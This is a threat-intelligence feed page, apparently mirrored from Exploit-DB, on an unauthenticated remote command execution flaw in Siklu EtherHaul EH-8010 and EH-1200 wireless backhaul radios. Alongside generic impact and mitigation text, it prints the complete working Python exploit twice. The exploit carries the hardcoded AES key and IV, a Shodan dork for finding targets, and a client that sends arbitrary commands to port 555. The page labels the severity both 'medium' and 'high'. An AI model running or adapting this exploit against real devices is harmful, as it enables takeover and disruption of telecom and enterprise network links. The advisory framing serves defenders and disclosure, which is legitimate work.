Reconnecting to live updates…

Siklu EtherHaul Series EH-8010 - Remote Command Execution

Severity: mediumType: exploit

The Siklu EtherHaul Series EH-8010 devices are vulnerable to a remote command execution (RCE) exploit that allows attackers to execute arbitrary commands on the affected device remotely. This vulnerability is exploitable via the device's web interface or network services, enabling unauthorized control without requiring user interaction or authentication. Exploit code is publicly available in Python, increasing the risk of exploitation. Although no known exploits are currently observed in the wild, the presence of exploit code and the nature of the vulnerability pose a significant threat. The vulnerability affects network infrastructure devices commonly used for high-capacity wireless backhaul, which are critical for telecommunications and enterprise networks. European organizations relying on Siklu EtherHaul devices for network connectivity could face confidentiality, integrity, and availability risks if exploited. Mitigation is complicated by the absence of official patches, requiring network segmentation, access controls, and monitoring to reduce exposure. Countries with significant telecommunications infrastructure deployments and strategic importance in Europe are at higher risk. Given the ease of exploitation and potential impact, the severity is assessed as high.

AI Analysis

Technical Summary

The Siklu EtherHaul Series EH-8010, a line of high-capacity wireless backhaul devices used in telecommunications and enterprise networks, is affected by a remote command execution vulnerability. This security flaw allows an attacker to remotely execute arbitrary commands on the device without authentication or user interaction, leveraging weaknesses in the device's web interface or network services. The exploit is publicly available as Python code, facilitating weaponization by attackers. The vulnerability can lead to full compromise of the device, enabling attackers to disrupt network operations, intercept or manipulate traffic, and potentially pivot to other internal systems. Although no official patches or updates have been released by Siklu at the time of reporting, the exploit code's availability increases the urgency for mitigation. The vulnerability's exploitation could severely impact network availability and data confidentiality, especially in environments where these devices serve as critical infrastructure for wireless backhaul. The lack of authentication requirement and remote exploitability make this a high-risk threat. Organizations using these devices must implement compensating controls such as strict network segmentation, firewall rules restricting access to management interfaces, and continuous monitoring for suspicious activity. The exploit's Python implementation indicates ease of use and adaptability for attackers.

Potential Impact

For European organizations, the exploitation of this vulnerability could lead to significant disruptions in network connectivity, particularly for telecommunications providers and enterprises relying on Siklu EtherHaul devices for wireless backhaul. Confidentiality risks include interception or manipulation of sensitive data traversing the compromised devices. Integrity could be compromised by attackers altering device configurations or injecting malicious traffic. Availability is at high risk as attackers could disrupt or disable network links, causing outages or degraded service. The impact extends to critical infrastructure sectors such as telecommunications, finance, government, and utilities, where network reliability is paramount. Given the strategic importance of network infrastructure in Europe and the increasing reliance on wireless backhaul solutions, this vulnerability could facilitate espionage, sabotage, or large-scale denial of service attacks. The absence of patches necessitates immediate mitigation to prevent exploitation and protect sensitive communications and services.

Mitigation Recommendations

1. Immediately restrict access to the management interfaces of Siklu EtherHaul EH-8010 devices by implementing strict firewall rules and network segmentation to limit exposure to trusted administrative networks only. 2. Deploy network intrusion detection and prevention systems (IDS/IPS) to monitor for anomalous traffic patterns or known exploit signatures related to the Python-based RCE exploit. 3. Conduct regular audits of device configurations and logs to detect unauthorized changes or suspicious activities. 4. If possible, isolate vulnerable devices from the internet and untrusted networks to reduce attack surface. 5. Engage with Siklu support channels to obtain any available firmware updates or security advisories and apply patches promptly once released. 6. Implement multi-factor authentication (MFA) and strong password policies for device management interfaces to add layers of defense. 7. Consider deploying compensating controls such as VPNs or secure tunnels for management traffic to protect against interception and unauthorized access. 8. Prepare incident response plans specifically addressing potential exploitation scenarios of these devices. 9. Educate network administrators about the vulnerability and the importance of monitoring and restricting access.

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Sweden, Poland, Belgium, Finland

Indicators of Compromise

exploit-code: # Exploit Title:Siklu EtherHaul Series EH-8010 - Remote Command Execution # Shodan Dork: "EH-8010" or "EH-1200" # Date: 2025-08-02 # Exploit Author: semaja2 - Andrew James <semaja2@gmail.com> # Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon # Software Link: ftp://ftp.bubakov.net/siklu/ # Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3 # Tested on: Linux # CVE: CVE-2025-57174 # Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/ #!/usr/bin/env python3 import argparse, socket, struct from Crypto.Cipher import AES PORT = 555 HDR_LEN = 0x90 IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72) KEY = bytes([ 0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5, 0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17, 0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0, 0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82 ]) def recv_exact(sock: socket.socket, n: int) -> bytes: out = bytearray() while len(out) < n: chunk = sock.recv(n - len(out)) if not chunk: raise ConnectionError('socket closed') out += chunk return bytes(out) def pad16_zero(b: bytes) -> bytes: r = len(b) & 0x0F return b if r == 0 else (b + b'\x00' * (16 - r)) def hdr_checksum(hdr: bytes) -> int: return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF def build_header(flag: int, msg: int, payload_len: int) -> bytes: hdr = bytearray(HDR_LEN) hdr[0] = flag & 0xFF hdr[1] = msg & 0xFF struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF) struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr)) return bytes(hdr) class RFPipeSession: def __init__(self, key: bytes, iv0: bytes): self.key = key self.send_iv = iv0 self.recv_iv = iv0 def enc_send(self, sock: socket.socket, data: bytes) -> None: cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv) ct = cipher.encrypt(data) self.send_iv = ct[-16:] sock.sendall(ct) def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes: if n_plain <= 0: return b'' n_padded = (n_plain + 15) & ~15 ct = recv_exact(sock, n_padded) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt[:n_plain] def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None: if len(hdr_plain) != HDR_LEN: raise ValueError('header must be 0x90 bytes') self.enc_send(sock, hdr_plain) def recv_header(self, sock: socket.socket) -> bytes: ct = recv_exact(sock, HDR_LEN) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt def connect_any(host: str, port: int) -> socket.socket: infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM) last_err = None for fam, st, proto, _, sa in infos: s = socket.socket(fam, st, proto) try: s.connect(sa) return s except Exception as e: last_err = e s.close() raise ConnectionError(f'connect failed: {last_err}') def main(): ap = argparse.ArgumentParser(description='rfpiped command client (msg 0x01)') ap.add_argument('target', help='IPv4/IPv6 address') ap.add_argument('command', help='command string (e.g., "mo-info system")') ap.add_argument('--nul', action='store_true', help='append NUL terminator to command') ap.add_argument('--recv', action='store_true', help='receive and print response') args = ap.parse_args() payload = args.command.encode('utf-8') if args.nul: payload += b'\x00' hdr_plain = build_header(flag=0x00, msg=0x01, payload_len=len(payload)) sess = RFPipeSession(KEY, IV0) with connect_any(args.target, PORT) as s: sess.send_header(s, hdr_plain) if payload: sess.enc_send(s, pad16_zero(payload)) if args.recv: rh = sess.recv_header(s) flag = rh[0]; rmsg = rh[1] rlen = struct.unpack_from('<I', rh, 0x08)[0] print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}') if rmsg in (0x03, 0x05): return if rlen: body = sess.dec_recv(s, rlen) if body.endswith(b'\x00'): body = body[:-1] try: print(body.decode('utf-8', errors='replace')) except Exception: print(body.hex()) if __name__ == '__main__': main()

Siklu EtherHaul Series EH-8010 - Remote Command Execution

Severity: medium

Type: exploit

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Sweden, Poland, Belgium, Finland

Indicators of Compromise

exploit-code: # Exploit Title:Siklu EtherHaul Series EH-8010 - Remote Command Execution # Shodan Dork: "EH-8010" or "EH-1200" # Date: 2025-08-02 # Exploit Author: semaja2 - Andrew James <semaja2@gmail.com> # Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon # Software Link: ftp://ftp.bubakov.net/siklu/ # Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3 # Tested on: Linux # CVE: CVE-2025-57174 # Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/ #!/usr/bin/env python3 import argparse, socket, struct from Crypto.Cipher import AES PORT = 555 HDR_LEN = 0x90 IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72) KEY = bytes([ 0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5, 0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17, 0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0, 0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82 ]) def recv_exact(sock: socket.socket, n: int) -> bytes: out = bytearray() while len(out) < n: chunk = sock.recv(n - len(out)) if not chunk: raise ConnectionError('socket closed') out += chunk return bytes(out) def pad16_zero(b: bytes) -> bytes: r = len(b) & 0x0F return b if r == 0 else (b + b'\x00' * (16 - r)) def hdr_checksum(hdr: bytes) -> int: return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF def build_header(flag: int, msg: int, payload_len: int) -> bytes: hdr = bytearray(HDR_LEN) hdr[0] = flag & 0xFF hdr[1] = msg & 0xFF struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF) struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr)) return bytes(hdr) class RFPipeSession: def __init__(self, key: bytes, iv0: bytes): self.key = key self.send_iv = iv0 self.recv_iv = iv0 def enc_send(self, sock: socket.socket, data: bytes) -> None: cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv) ct = cipher.encrypt(data) self.send_iv = ct[-16:] sock.sendall(ct) def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes: if n_plain <= 0: return b'' n_padded = (n_plain + 15) & ~15 ct = recv_exact(sock, n_padded) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt[:n_plain] def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None: if len(hdr_plain) != HDR_LEN: raise ValueError('header must be 0x90 bytes') self.enc_send(sock, hdr_plain) def recv_header(self, sock: socket.socket) -> bytes: ct = recv_exact(sock, HDR_LEN) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt def connect_any(host: str, port: int) -> socket.socket: infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM) last_err = None for fam, st, proto, _, sa in infos: s = socket.socket(fam, st, proto) try: s.connect(sa) return s except Exception as e: last_err = e s.close() raise ConnectionError(f'connect failed: {last_err}') def main(): ap = argparse.ArgumentParser(description='rfpiped command client (msg 0x01)') ap.add_argument('target', help='IPv4/IPv6 address') ap.add_argument('command', help='command string (e.g., "mo-info system")') ap.add_argument('--nul', action='store_true', help='append NUL terminator to command') ap.add_argument('--recv', action='store_true', help='receive and print response') args = ap.parse_args() payload = args.command.encode('utf-8') if args.nul: payload += b'\x00' hdr_plain = build_header(flag=0x00, msg=0x01, payload_len=len(payload)) sess = RFPipeSession(KEY, IV0) with connect_any(args.target, PORT) as s: sess.send_header(s, hdr_plain) if payload: sess.enc_send(s, pad16_zero(payload)) if args.recv: rh = sess.recv_header(s) flag = rh[0]; rmsg = rh[1] rlen = struct.unpack_from('<I', rh, 0x08)[0] print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}') if rmsg in (0x03, 0x05): return if rlen: body = sess.dec_recv(s, rlen) if body.endswith(b'\x00'): body = body[:-1] try: print(body.decode('utf-8', errors='replace')) except Exception: print(body.hex()) if __name__ == '__main__': main()

Source: Exploit-DB RSS Feed

Published: Sat Jan 17 2026

Siklu EtherHaul Series EH-8010 - Remote Command Execution

Medium

Exploitremote web exploit

Published: Sat Jan 17 2026 (01/17/2026, 00:00:00 UTC)

Source: Exploit-DB RSS Feed

Description

AI-Powered Analysis

AILast updated: 01/18/2026, 07:48:02 UTC

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Need more detailed analysis?Upgrade to Pro Console

Technical Details

Edb Id: 52466
Has Exploit Code: true
Code Language: python

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for Siklu EtherHaul Series EH-8010 - Remote Command Execution

# Exploit Title:Siklu EtherHaul Series EH-8010 - Remote Command Execution
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version:  EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57174
# Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/

#!/usr/bin/env python3
imp... (4159 more characters)

Code Length: 4,659 characters

Threat ID: 696c9008d302b072d9ad2abb

Added to database: 1/18/2026, 7:47:20 AM

Last enriched: 1/18/2026, 7:48:02 AM

Last updated: 1/18/2026, 2:31:08 PM

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by

Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.